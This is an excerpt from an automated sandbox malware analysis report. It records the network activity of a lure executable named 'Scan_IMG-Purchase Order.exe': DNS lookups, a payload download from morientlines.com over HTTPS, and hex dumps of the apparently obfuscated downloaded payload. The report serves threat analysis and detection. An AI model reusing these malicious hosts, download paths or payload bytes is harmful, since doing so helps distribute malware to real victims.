Jul 25, 2022 15:50:54.469449997 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:54.618529081 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.618772030 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:54.619457006 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.619600058 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:54.620565891 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.620728970 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:54.621035099 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.621193886 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:54.621540070 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.621650934 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:54.621799946 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.621933937 CEST 49758 443 192.168.2.4 103.11.189.121

Copyright Joe Security LLC 2022 Page 28 of 74

Timestamp Source Port Dest Port Source IP Dest IP

Jul 25, 2022 15:50:54.622020006 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.622148037 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:54.622272968 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.622385025 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:54.622534037 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.622653008 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:54.622663975 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.622694969 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.622757912 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:54.622777939 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:54.622920036 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.623049021 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:54.656095982 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.656307936 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:54.659290075 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.659420967 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:54.659506083 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.659595966 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:54.659735918 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.659842014 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:54.809710026 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.809906006 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:54.813909054 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.814064026 CEST 49758 443 192.168.2.4 103.11.189.121

Jul 25, 2022 15:50:54.815027952 CEST 443 49758 103.11.189.121 192.168.2.4

Jul 25, 2022 15:50:54.815148115 CEST 49758 443 192.168.2.4 103.11.189.121

UDP Packets
Timestamp Source Port Dest Port Source IP Dest IP

Jul 25, 2022 15:50:51.960721016 CEST 53775 53 192.168.2.4 8.8.8.8

Jul 25, 2022 15:50:52.138900995 CEST 53 53775 8.8.8.8 192.168.2.4

Jul 25, 2022 15:51:28.172810078 CEST 56076 53 192.168.2.4 8.8.8.8

Jul 25, 2022 15:51:28.192398071 CEST 53 56076 8.8.8.8 192.168.2.4

Jul 25, 2022 15:51:30.221482992 CEST 60758 53 192.168.2.4 8.8.8.8

Jul 25, 2022 15:51:30.411653042 CEST 53 60758 8.8.8.8 192.168.2.4

Jul 25, 2022 15:51:38.263119936 CEST 64909 53 192.168.2.4 8.8.8.8

Jul 25, 2022 15:51:38.473285913 CEST 53 64909 8.8.8.8 192.168.2.4

DNS Queries
Timestamp Source IP Dest IP Trans ID OP Code Name Type Class

Jul 25, 2022 15:50:51.960721016 CEST 192.168.2.4 8.8.8.8 0x5318 Standard query morientlines.com A (IP address) IN (0x0001)
(0)

Jul 25, 2022 15:51:28.172810078 CEST 192.168.2.4 8.8.8.8 0x9a0b Standard query mosesmanse A (IP address) IN (0x0001)
(0) rvernew.ho
pto.org

Jul 25, 2022 15:51:30.221482992 CEST 192.168.2.4 8.8.8.8 0x1e7 Standard query morientlines.com A (IP address) IN (0x0001)
(0)

Jul 25, 2022 15:51:38.263119936 CEST 192.168.2.4 8.8.8.8 0x8b62 Standard query morientlines.com A (IP address) IN (0x0001)
(0)

DNS Answers
Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class

Jul 25, 2022 8.8.8.8 192.168.2.4 0x5318 No error (0) morientlines.com 103.11.189.121 A (IP address) IN
15:50:52.138900995 CEST (0x0001)

Jul 25, 2022 8.8.8.8 192.168.2.4 0x9a0b No error (0) mosesmanse 185.222.57.173 A (IP address) IN
15:51:28.192398071 CEST rvernew.ho (0x0001)
pto.org

Jul 25, 2022 8.8.8.8 192.168.2.4 0x1e7 No error (0) morientlines.com 103.11.189.121 A (IP address) IN
15:51:30.411653042 CEST (0x0001)

Copyright Joe Security LLC 2022 Page 29 of 74

Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class

Jul 25, 2022 8.8.8.8 192.168.2.4 0x8b62 No error (0) morientlines.com 103.11.189.121 A (IP address) IN
15:51:38.473285913 CEST (0x0001)

HTTP Request Dependency Graph

morientlines.com

HTTPS Proxied Packets

Destination
Session ID Source IP Source Port Destination IP Process
Port

0 192.168.2.4 49757 103.11.189.121 443 C:\Users\user\Desktop\Scan_IMG-Purchase Order.exe

kBytes
Timestamp Direction Data
transferred

2022-07-25 13:50:53 UTC 0 OUT GET /xerofileupshsgdydpdfseudidofndhehuplosdsdocumentghy/Scxozmyplhmqutylctxlkglsugzstqx HTTP/1.1

User-Agent: lVali
Host: morientlines.com

2022-07-25 13:50:53 UTC 0 IN HTTP/1.1 200 OK

Date: Mon, 25 Jul 2022 13:50:52 GMT
Server: Apache
Upgrade: h2
Connection: Upgrade, close
Last-Modified: Mon, 25 Jul 2022 02:21:51 GMT
Accept-Ranges: bytes
Content-Length: 374272

2022-07-25 13:50:53 UTC 0 IN Data Raw: 83 24 5a ca 39 ca ca ca ce ca ca ca 35 35 ca ca 82 ca ca ca ca ca ca ca 0a ca ca ca ca ca ca ca ca ca ca ca ca

ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca 37 ca ca d8 55 84 d8 ca 7e 3f 03 57 82 37 16 03
57 1e 32 9f a9 ea 3a 3c a5 9d 3c 97 a3 ea 99 97 38 38 a5 3e ea 2c 9b ea 3c ab 38 ea 9f 38 ea 0e 85 89 ea a3 a5 2e 9b f8
43 43 d4 ee ca ca ca ca ca ca ca 8a c2 51 16 4e cf ab 55 4e cf ab 55 4e cf ab 55 e4 6f 7c 55 bb cf ab 55 8c 92 74 55 c5 cf
ab 55 8c 92 cb 55 2e cf ab 55 8c 92 5e 55 9c cf ab 55 c3 17 c0 55 4c cf ab 55 c3 17 bc 55 4a cf ab 55 c3 17 33 55 bb cf
ab 55 c3 17 b0 55 d7 cf ab 55 4e cf 3e 55 78 d1 ab 55 2f aa cb 55 50 cf ab 55 2f aa 5e 55 8e cf ab 55 bf 01 78 55 bb cf ab
55 2f aa e1 55 bb cf ab 55 1c 9f 99 32 4e cf ab
Data Ascii: $Z9557U~?W7W2:<<88>,<88.CCQNUNUNUo|UUtUUU.U^UUULUUJU3UUUUN>UxU/UPU/^UUxUU/UU2N

Destination
Session ID Source IP Source Port Destination IP Process
Port

1 192.168.2.4 49758 103.11.189.121 443 C:\Users\user\Desktop\Scan_IMG-Purchase Order.exe

kBytes
Timestamp Direction Data
transferred

2022-07-25 13:50:53 UTC 8 OUT GET /xerofileupshsgdydpdfseudidofndhehuplosdsdocumentghy/Scxozmyplhmqutylctxlkglsugzstqx HTTP/1.1

User-Agent: 97
Host: morientlines.com
Cache-Control: no-cache

2022-07-25 13:50:54 UTC 8 IN HTTP/1.1 200 OK

Date: Mon, 25 Jul 2022 13:50:53 GMT
Server: Apache
Upgrade: h2
Connection: Upgrade, close
Last-Modified: Mon, 25 Jul 2022 02:21:51 GMT
Accept-Ranges: bytes
Content-Length: 374272

2022-07-25 13:50:54 UTC 8 IN Data Raw: 83 24 5a ca 39 ca ca ca ce ca ca ca 35 35 ca ca 82 ca ca ca ca ca ca ca 0a ca ca ca ca ca ca ca ca ca ca ca ca

2022-07-25 13:50:54 UTC 16 IN Data Raw: ca ca f7 b2 43 b9 c2 3d 40 3b 82 3d ca ca ca c1 92 7c 35 9c ac 52 89 1b f7 aa 43 30 3b fa 41 30 bf 79 c6 45 ed

b1 b0 45 ed fd c1 92 f7 17 ce c3 d6 7f b7 f7 25 ca ca ca b7 17 ca 35 35 35 b9 f7 fa b7 2f fa a9 ca ca a9 3b ef fa a9 ca ca b7
2f fa 35 ca ca 40 3b ef fa 35 ca ca c1 f7 b9 b2 ea 45 ed 0d c1 94 69 9c 2d 27 30 2d 25 30 3b 25 ca 30 5b ca 35 30 b9 8a
fa 30 bf 79 c8 b9 f9 ea 18 45 bb fa 35 35 35 b2 a4 c8 35 35 fd 3b d2 cd 0c ca d2 cd 0c ca fd 3b d6 cd 0c ca d2 cd 0c ca 88
ca ce ca ca 84 72 cd 0c ca c1 8c bf ca bf 0a ce b9 8c d2 18 ab 29 fd 3b 76 ed 0c ca 76 ed 0c ca fd 3b 7a ed 0c ca 76 ed
0c ca 95 28 91 f9 c3 0a ca 89 20 8d 8b f1 d2 cd 0c ca 88 76 ed 0c ca c1 b1 ce 21 dc c1 a5 ce 32 ca 4a ca ca 34 ca 8d b2
bb 1d 35 35 c1 33 71 31 ab b4 84 6d ca ca ca
Data Ascii: C=@;=|5RC0;A0yEE%555/;/5@;5Ei-'0-%0;%0[500yE55555;;r);vv;zv( v!2J4553q1m

Copyright Joe Security LLC 2022 Page 30 of 74

kBytes
Timestamp Direction Data
transferred

2022-07-25 13:50:54 UTC 24 IN Data Raw: 9c 21 1b bf 0f 21 21 c1 0e ee d2 b2 d7 c4 35 35 91 8c ce ca f9 89 20 8d bf f9 bf a0 bf 05 b2 6c 35 35 35 c1 49

bb 9c 3e fa c1 14 c6 18 46 f4 6f 98 b3 f0 bb 35 48 ec 5f 27 6f 05 48 cc bf 05 5f 2f 37 bc c3 ce 4d b2 dc ae 35 35 c1 49 bf
a2 c1 1c c6 5f c4 b2 12 37 ca ca 95 28 91 f9 89 20 b9 8e ba bb 9c 3e 18 bb 8a 3e 14 c1 3c c6 c1 22 c6 6f a8 46 0a bb 11
48 06 81 37 a0 37 a4 bf 3e ee d2 37 a2 bf 1e ee ce 2d 11 45 80 d2 bf e6 ee 45 bb cf ca ca ca b9 b8 cc bf 3e ee d6 04 d4
3e 77 04 14 37 3e 16 b9 8c cc 71 1e ee d6 3c d4 71 1e ee d2 3c b2 67 8a 21 fa 04 d4 3e 5b 04 14 37 3e fa 04 14 cc 3e e2
04 14 39 3e 59 b9 8c ce 71 1e ee d6 3c ae 71 1e ee d2 3c 8c 67 8a 21 d4 b9 8c cc 0c bf 9a 61 0e ee ce b9 8e da 28 91 f9
b9 8c cc b9 8c cc 67 8a 71 1e ee d2 ad d0 bf 9a 61
Data Ascii: !!!55 l555I>Fo5H_'oH_/7M55I_7( >><"oFH77>7-EE>>w7>q<q<g!>[7>>9>Yq<q<g!a(gqa

2022-07-25 13:50:54 UTC 31 IN Data Raw: 8a 35 5b 2a 0b 0c ca c1 8a 35 5b 26 0b 0c ca c1 8a 35 5b 22 0b 0c ca c1 8a 35 5b 22 0b 0c ca c1 8a 35 5b 1e

0b 0c ca c1 8a 35 5b 1a 0b 0c ca c1 8a 35 5b 16 0b 0c ca c1 8a 35 5b 12 0b 0c ca c1 8a 35 5b 0e 0b 0c ca c1 8a 35 5b 0a
0b 0c ca c1 8a 35 5b 06 0b 0c ca c1 8a 35 5b 02 0b 0c ca c1 8a 35 5b fe 0b 0c ca c1 8a 35 5b fa 0b 0c ca c1 8a 35 5b f6
0b 0c ca c1 8a 35 5b f2 0b 0c ca c1 8a 35 5b ee 0b 0c ca c1 8a 35 5b ea 0b 0c ca c1 8a 35 5b e6 0b 0c ca c1 8a 35 5b e2
0b 0c ca c1 8a 35 5b de 0b 0c ca c1 8a 35 5b de 0b 0c ca c1 8a 35 5b da 0b 0c ca c1 8a 35 5b d6 0b 0c ca c1 8a 35 5b d2
0b 0c ca c1 8a 35 5b ce 0b 0c ca c1 8a 35 5b ca 0b 0c ca c1 8a 35 5b c6 9e 0c ca c1 8a 35 5b c2 9e 0c ca c1 8a 35 5b be
9e 0c ca c1 8a 35 5b ba 9e 0c ca c1 8a 35 5b b6 9e 0c ca
Data Ascii: 5[*5[&5["5["5[5[5[5[5[5[5[5[5[5[5[5[5[5[5[5[5[5[5[5[5[5[5[5[5[5[5[5[

2022-07-25 13:50:54 UTC 39 IN Data Raw: 5f 27 95 f9 4a 2f 1a 45 bb ff c8 35 35 84 d2 ca ca ca ef da ca ca ca c3 ab dd 1f fc be 35 35 ed 37 21 cc ed ca bf

90 e9 ca 4a 2f 7d 3e 75 e9 37 4a 2f 7b 3e 02 e9 cc 4a 2f 10 3e dc e9 39 4a 2f 18 3e 41 4a 2f 83 45 bb 54 c8 35 35 e9 ce
82 dc ca ca ca c1 8b a6 6f 8c 40 5b 84 cc ca ca ca 4a 2f 83 ab 51 45 80 4b de 82 0c ca 21 dc c1 7b a6 84 39 ca ca ca b9
c2 dc 40 3b 82 45 ca ca ca 89 1a 1c c3 7b cd bf bc 45 80 05 c1 93 c6 b2 d1 37 ca ca bf f7 c3 ab cd f9 89 1a c3 7b b6 c1
93 c6 b2 56 f1 35 35 22 91 f9 b2 21 35 35 35 95 28 91 91 c1 1b 93 8c d6 ca c1 8a 8b c1 b6 89 20 8d c1 27 c1 c4 c1 a2 bb
11 3e 5d bb c0 3e 59 c1 90 b2 d3 c4 35 35 1a c1 7b d6 1a c1 7b d2 1a c1 98 c1 f9 c1 0d b2 8f c6 35 35 90 ce 39 ca c1 f9
21 cc 69 8a 95 28 91 93 8c d2 ca 8b c1 b6 87 c1 83
Data Ascii: _'J/E55557!J/}>u7J/{>J/>9J/>AJ/ET55o@[J/QEK!{9@;E{E7{V55"!555( '>]>Y55{{559!i(

2022-07-25 13:50:54 UTC 47 IN Data Raw: 82 0c ca b2 df d5 35 35 c1 92 c1 49 c1 90 b2 cc 6c 35 35 c1 8b a6 d7 ee 82 0c ca b2 8f 9e 35 35 bb 8a 3e f4

c3 7b a2 1a d7 f2 82 0c ca b2 b5 d5 35 35 c1 92 c1 49 c1 90 b2 a2 d7 35 35 c1 8b a2 d7 f2 82 0c ca b2 65 9e 35 35 bb 8a
ab 4e c1 7b be 1a 45 ed 83 b2 45 ed 8b b4 c1 fd b2 22 21 35 35 52 7b 29 69 8a 24 8f 8f 2e bf da 32 f7 72 0a ca c3 7b a2
84 39 ca ca ca b2 cd 66 35 35 c3 7b c2 b2 a1 66 35 35 f9 1f 77 cb 35 35 21 19 45 80 7b 29 95 28 91 c1 1b 93 f9 35 35 35
35 37 ca ca ca 9b ca ca ca 35 35 35 35 39 ca ca ca 2e 2e 2e ca 89 20 8d 8b b9 8e ba bf d6 ee c1 bc c1 b2 69 11 b9 05 35
c1 a0 c1 43 ee 82 0c ca c1 fb b2 04 c4 35 35 4e 8a ab dc c1 a0 ef 96 74 0a ca c1 fb b2 f2 c4 35 35 4e 8a 3e ce 69 35 21 f4
c1 a0 c1 43 f2 82 0c ca c1 fb b2 47 c4 35 35 4e 8a ab
Data Ascii: 55Il5555>{55I55e55N{EE"!55R{)i$.2r{9f55{f55w55!E{)(5555755559... i5C55Nt55N>i5!CG55N

2022-07-25 13:50:54 UTC 55 IN Data Raw: 9c ab 2b bf de ee b9 06 ee ca 45 4e db 37 ca ca c1 ce ee b9 42 de ca 45 4e 62 37 ca ca c1 ce ee c1 22 de 4a

71 ca 3e d4 fd 0e ee ce f2 84 0c ca 21 d2 fd 0e ee ce f2 88 0c ca c1 79 ce b2 19 c5 35 35 c1 c2 bb 35 45 56 1e 37 ca ca
7d 69 c0 c3 ce 80 c1 89 ce b9 46 4c ce ca 3e 4d c1 89 ce c1 ce 4c c3 de 80 c1 81 ce c1 1e c7 ce bf cc 1f d0 37 ca ca c1
89 ce b9 46 4c d6 ca 45 4e c2 ca ca ca c3 ce 80 c1 89 ce c1 0e 4c d6 69 9c bf 1e ee d2 45 80 da 4e 9c 45 4e d7 ca ca ca
c1 16 ee d2 39 ff 39 ff c1 36 ee d2 f7 23 e8 41 03 45 80 9c 45 80 5c f2 ef 0c ca 69 94 bf 16 ee d2 4a 42 37 ca 3e 44 c1 1e
ee d2 39 9c 39 9c c1 16 ee d2 f7 1f e8 41 07 45 80 12 37 45 80 bf f2 ef 0c ca 69 07 bf 1e ee d2 4a 42 cc ca 3e 1c c1 1e ee
d2 39 9c 39 9c c1 16 ee d2 f7 1f e8 41 07 45 80 12
Data Ascii: +EN7BENb7"Jq>!y555EV7}iFL>ML7FLENLiENEN996#AEE\iJB7>D99AE7EiJB>99AE

2022-07-25 13:50:54 UTC 63 IN Data Raw: 22 35 35 1f ac ca ca ca c3 8b b6 d7 5a bf 0c ca b2 2a b5 35 35 c1 83 b6 7c 37 d7 82 17 0a ca b2 5b 03 35 35

b2 ce 22 35 35 1f 86 ca ca ca c3 8b b2 d7 6e 52 0c ca b2 04 b5 35 35 c1 83 b2 7c 37 d7 e6 ac 0a ca b2 35 96 35 35 b2 a8
8d 35 35 1f 60 ca ca ca c3 8b ae d7 8a 52 0c ca b2 de b5 35 35 c1 83 ae 7c 37 d7 86 15 0a ca b2 0f 96 35 35 b2 82 8d 35
35 21 a9 c3 8b aa d7 36 52 0c ca b2 27 48 35 35 c1 83 aa 7c 37 d7 4e ac 0a ca b2 80 96 35 35 b2 cb 8d 35 35 21 1a d7
1a 54 0c ca c1 ca bf 7b 92 90 7b 96 41 bf 93 9a 90 7b 9e ca c3 8b 8e c1 f9 b2 46 8e 35 35 c1 7b 8e bf 7b a2 90 7b a6 41
c3 7b 92 1a 34 cc c3 8b 8a d7 e6 bf 0c ca b2 d5 48 35 35 c1 83 8a 7c 37 d7 ee 40 0a ca b2 6a 96 35 35 b2 79 8d 35 35
69 8a 24 8f 8f 2e bf da 32 96 1d 0a ca c3 7b 8a 84 cc ca ca ca
Data Ascii: "55Z*55|7[55"55nR55|755555`R55|75555!6R'H55|7N5555!T{{A{F55{{{A{4H55|7@j55y55i$.2{

2022-07-25 13:50:54 UTC 70 IN Data Raw: bf 8b be 1f c1 ca ca ca c1 7b c6 c1 0a d2 45 80 ca 69 9c bf 7b ba bf 8b be 21 42 c1 7b c6 c1 0a d2 45 ed ca 69

9c bf 7b ba bf 8b be 21 9b c1 7b c6 c1 0a d2 c1 ca 69 9c bf 7b ba bf 8b be 21 89 c1 7b c6 c1 0a d2 c1 da bf 8b ba c1 1a ce
bf 8b be 21 0a c1 7b c6 c1 0a d2 b2 69 c6 35 35 bf 7b ba bf 8b be 21 63 c1 7b c6 b2 f5 2f 35 35 bf 7b ba bf 8b be 21 53 c3
8b ba c1 7b c6 b2 8e 31 35 35 4e 8a ab d8 c1 7b c6 b2 6a 2f 35 35 bf 7b ba bf 8b be 69 8a 24 8f 8f 2e bf da 21 5d 1f 75
00 35 35 c1 7b c6 45 ed ca 30 84 de ca b2 3a 17 35 35 fd 7b ba ca ca ca ca fd 7b be ca ca ca ca b2 db 02 35 35 c1 7b ba
c1 8b be 95 28 91 c1 1b 93 f9 ca 0a e6 10 8b c1 b6 34 ca 34 ca 34 ca 89 c1 a2 69 8a 8b 32 44 3d 77 ca 2e 35 fa 2e bf ea
c1 09 c3 7b c6 b2 26 57 ca ca c3 7b c2 1a 34 ca
Data Ascii: {Ei{!B{Ei{!{i{!{!{i55{!c{/55{!S{155N{j/55{i$.!]u55{E0:55{{55{(444i2D=w.5.{&W{4

2022-07-25 13:50:54 UTC 78 IN Data Raw: 8f 22 35 35 c1 8b 6e c1 90 b2 6d ea 35 35 1f f5 ca ca ca c3 8b 6a c1 79 d2 45 80 ca b2 06 22 35 35 c1 8b 6a

c1 90 b2 e4 ea 35 35 1f 6c ca ca ca c3 8b 66 c1 79 d2 45 ed ca b2 55 22 35 35 c1 8b 66 c1 90 b2 33 55 35 35 1f bb ca ca
ca c1 79 d2 c1 ca 69 9c 1c 1a c3 7b 62 b2 21 22 35 35 c1 8b 62 c1 90 b2 13 55 35 35 21 32 c1 79 d2 35 3a ce 35 fa c3 7b
5e b2 05 22 35 35 c1 8b 5e c1 90 b2 f7 55 35 35 21 16 c1 79 d2 c1 9a c1 90 b2 99 31 35 35 21 08 c3 8b 5a c1 f9 b2 d5 2f
35 35 c1 8b 5a c1 90 b2 d3 55 35 35 21 f2 c1 90 b2 0a 55 35 35 c1 9a c1 f9 b2 e9 c4 35 35 4e 8a ab de c3 8b 56 c1 f9 b2
ab 2f 35 35 c1 8b 56 c1 90 b2 a9 55 35 35 69 8a 24 8f 8f 2e bf da 32 91 f0 77 ca c3 7b 56 84 3d ca ca ca b2 5f 55 35 35
c3 7b 72 84 39 ca ca ca b2 8a f0 35 35 c3 7b 7e 84 41 ca
Data Ascii: "55nm55jyE"55j55lfyEU"55f3U55yi{b!"55bU55!2y5:5{^"55^U55!y155!Z/55ZU55!U5555NV/55VU55i$.
2w{V=_U55{r955{~A

2022-07-25 13:50:54 UTC 86 IN Data Raw: 81 b9 31 35 ab b2 69 8a 24 8f 8f 2e bf da 32 62 0e 77 ca 32 7a 8c 0c ca b2 f6 5b 35 35 f9 1f 34 2f c8 35 21 b8

28 91 93 f9 8b c1 b6 b2 4e ce ca ca 93 8c ce ca 89 20 8d 87 c1 27 c1 c4 c1 a2 c1 9e 45 ed d0 b2 0a 41 ca ca 4e 8a 3e de
45 ed 79 ce 1a c1 98 c1 0d c1 0e ee ce c1 e2 35 89 e6 21 3d c1 f9 b2 7b ce ca ca 24 95 28 91 f9 8b c1 b6 b9 8e c2 89 20
8d c1 27 bf 8b c6 c1 a2 c1 b3 d2 30 71 b1 ce 3e 55 c3 8b c2 45 ed d0 b2 c2 d4 ca ca 4e 8a 3e da 8d c1 98 c1 8b c6 c1 7b
c2 c1 e2 35 89 e6 21 3d c1 f9 b2 37 ce ca ca 95 28 91 8f 8f 93 8c ce ca 8b c1 b6 b2 c2 39 ca ca 93 8c ce ca 8b c1 b6 87
89 20 8d c1 c4 c1 ba c3 7b 35 1a c1 0d c1 90 c1 e2 35 89 02 45 80 7b 35 c1 8b d2 c3 de 1c b7 8c 6e b1 0c ca 45 80 0e
cc a0 95 28 91 8f 93 8c ce ca c3 0a ca 89 20 8d 8b 87 c1
Data Ascii: 15i$.2bw2z[554/5!(N 'EAN>Ey5!={$( '0q>UEN>{5!=7(9 {55E{5nE(

2022-07-25 13:50:54 UTC 94 IN Data Raw: bc c1 a2 69 8a 8b 32 ba 99 77 ca 2e 35 fa 2e bf ea c3 7b c6 c1 0d b2 50 b4 c8 35 c1 83 c6 c1 a0 c1 f9 b2 48

37 ca ca 69 8a 24 8f 8f 2e bf da 32 2d 99 77 ca c3 7b c6 b2 1b b2 c8 35 f9 1f 41 a4 c8 35 21 ba 95 28 91 8f 93 f9 c3 0a ca
89 c1 0f c1 d4 c1 3f 45 80 3f 4a 1f 3b 3e 41 4a 1f 3b 3e 45 c8 ff 3e de 21 51 c1 01 b2 75 c8 35 35 91 f9 c1 01 b2 70 c8 35
35 91 f9 c1 01 b2 53 35 35 35 91 f9 c1 f9 b2 b2 aa c8 35 91 f9 c1 8a 89 c1 e4 c1 51 45 80 51 4a 21 3b 3e 41 4a 21 3b 3e
43 c8 01 3e da 21 49 b2 61 c8 35 35 91 f9 b2 76 c8 35 35 91 f9 b2 73 35 35 35 91 f9 c3 0a ca 8b c1 b6 b9 8e ba 89 20 69
11 bf 93 ba bf 83 c6 c1 a4 c1 ba 69 8a 8b 32 7f 9b 77 ca 2e 35 fa 2e bf ea c1 39 c1 ca 45 80 ca f6 3b 3e 43 f6 3b 3e 3f c8
92 3e e8 1f b7 ca ca ca c3 83 ba c1 09 c1 90 b2
Data Ascii: i2w.5.{P5H7i$.2-w{5A5!(?E?J;>AJ;>E>!Qu55p55S5555QEQJ!;>AJ!;>C>!Ia55v55s555 ii2w.5.9E;>C;>?>

Copyright Joe Security LLC 2022 Page 31 of 74

kBytes
Timestamp Direction Data
transferred

2022-07-25 13:50:54 UTC 102 IN Data Raw: c1 e2 35 89 d6 c1 7b a6 bf 7b a2 c1 7b a2 bb 8a 3e 3b b9 b2 ce c1 ca c1 8b c2 bb 9c 3e 3b b9 b4 ce c1 dc 39

9a 37 8b b2 35 7b b6 18 ab ff c1 7b ba c1 83 b2 69 9c b2 b0 8c c8 35 c1 7b ba c1 ca bf 7b aa c1 ab ae 18 bb c0 46 2a 10
fd 7b b6 ca ca ca ca c3 83 c6 c1 8b b6 c1 7b be c1 e2 35 89 d6 c1 7b c6 bb 8a 3e 3b b9 b2 ce c1 ca c1 a2 bb 11 3e da c1
8b aa c1 7b c6 c1 01 b2 93 e1 c8 35 37 93 aa c1 7b c2 bb 8a 3e 3b b9 b2 ce c1 ca c1 a2 bb 11 3e da c1 8b aa c1 7b c2
c1 01 b2 71 e1 c8 35 37 93 aa 35 7b b6 18 ab 72 69 8a 24 8f 8f 2e bf da 32 92 b9 77 ca c3 7b a6 b2 a7 f7 c8 35 c3 7b c2
84 cc ca ca ca b2 52 f7 c8 35 f9 1f 04 84 c8 35 21 19 28 91 c1 1b 93 f9 c1 8a 8b c1 b6 b9 8e be 89 20 8d 69 ff bf 83 be bf
8b c6 c1 a2 69 8a 8b 32 12 4e 77 ca 2e 35 fa 2e bf ea c1
Data Ascii: 5{{{>;>;975{{i5{{F*{{5{>;>{57{>;>{q575{ri$.2w{5{R55!( ii2Nw.5.

2022-07-25 13:50:54 UTC 110 IN Data Raw: ca b2 a5 f6 35 35 b2 bc c8 35 35 82 aa 8c 0c ca b2 2a f6 35 35 82 96 8c 0c ca b2 c0 88 c8 35 69 8a 24 8f 8f 2e

bf da 32 9d 6c 77 ca f9 1f d1 d1 c8 35 21 c2 93 f9 c3 0a ca 89 20 c1 bc c1 a2 71 29 b3 d8 c1 f9 61 90 b2 0b 58 c8 35 39
90 28 91 f9 c1 90 61 f9 b2 fd 58 c8 35 39 f9 28 91 f9 c1 8a 35 5b 36 a0 0c ca c1 8a 35 5b 32 a0 0c ca c1 8a 35 5b 2e a0
0c ca c1 8a 35 5b 32 a0 0c ca c1 8a 35 5b 2a a0 0c ca c1 8a 35 5b 26 a0 0c ca c1 8a 35 5b 22 a0 0c ca c1 8a 9a 6c 77 ca
47 d6 1e 89 3e 3c 9f 38 9d 77 3c 3c 97 af ce ca ca ca 82 da 0a ca 12 ca ca ca 82 da 0a ca e2 97 97 97 97 97 97 97 97 97
97 97 97 97 97 97 2e 40 77 3a 9f 12 a5 a5 a1 5a d6 d9 77 ca d8 d2 1e 16 9f 2c 7f 38 30 a5 de ca ca ca 37 ca ca ca 96 6c
77 ca da ca ca ca c1 8a 8b c1 b6 b9 8e c2 bf 8b c2 bf
Data Ascii: 5555*555i$.2lw5! q)aX59(aX59(5[65[25[.5[25[*5[&5["lwG><8w<<.@w:Zw,807lw

2022-07-25 13:50:54 UTC 117 IN Data Raw: 7b c6 b2 28 52 c8 35 c1 7b c2 b2 20 52 c8 35 69 8a 8b 32 de 8c 77 ca 2e 35 fa 2e bf ea c3 8b be c1 7b c6 b2

af 35 35 35 c1 8b be c3 7b c6 b2 e0 4e c8 35 c1 93 c6 c1 f9 bb 8a 3e 3b b9 b2 ce c1 ca c1 83 c2 c1 07 bb 9c 3e 3b b9 b4
ce c1 dc 71 9a b3 3d f1 37 ca ca ca 21 f6 c1 f7 bb 8a 3e 3b b9 b2 ce c1 ca c1 09 bb 9c 3e 3b b9 b4 ce c1 dc 71 9a b3 3b
b9 01 35 21 43 c1 8b c2 c1 7b c6 b2 c3 ef c8 35 c1 a2 69 8a 24 8f 8f 2e bf da 32 51 8c 77 ca c3 7b be 84 39 ca ca ca b2
6b b9 c8 35 f9 1f 1d b1 c8 35 21 21 c1 f9 91 c1 1b 93 f9 c1 8a 8b c1 b6 87 ef ce ca ca ca 34 ca 34 ca 7f ab 2f bd 83 c6 89
20 8d bf 83 be bf 8b c2 bf 7b c6 c1 b3 de c1 ab e2 c1 7b c6 b2 bd bd c8 35 c1 7b c2 b2 b5 bd c8 35 69 8a 8b 32 f7 f9 77
ca 2e 35 fa 2e bf ea c1 53 36 54 0c ca 45 80 51 c1 7b
Data Ascii: {(R5{ R5i2w.5.{555{N5>;>;q=7!>;>;q;5!C{5i$.2Qw{9k55!!44/ {{5{5i2w.5.S6TEQ{

2022-07-25 13:50:54 UTC 125 IN Data Raw: bb 8a 46 f4 0a c3 1e ee d2 c3 16 ee 12 45 80 fc 45 80 6f 61 2d bb c0 3e da bb c0 48 3d 88 37 ca ca ca 21 79

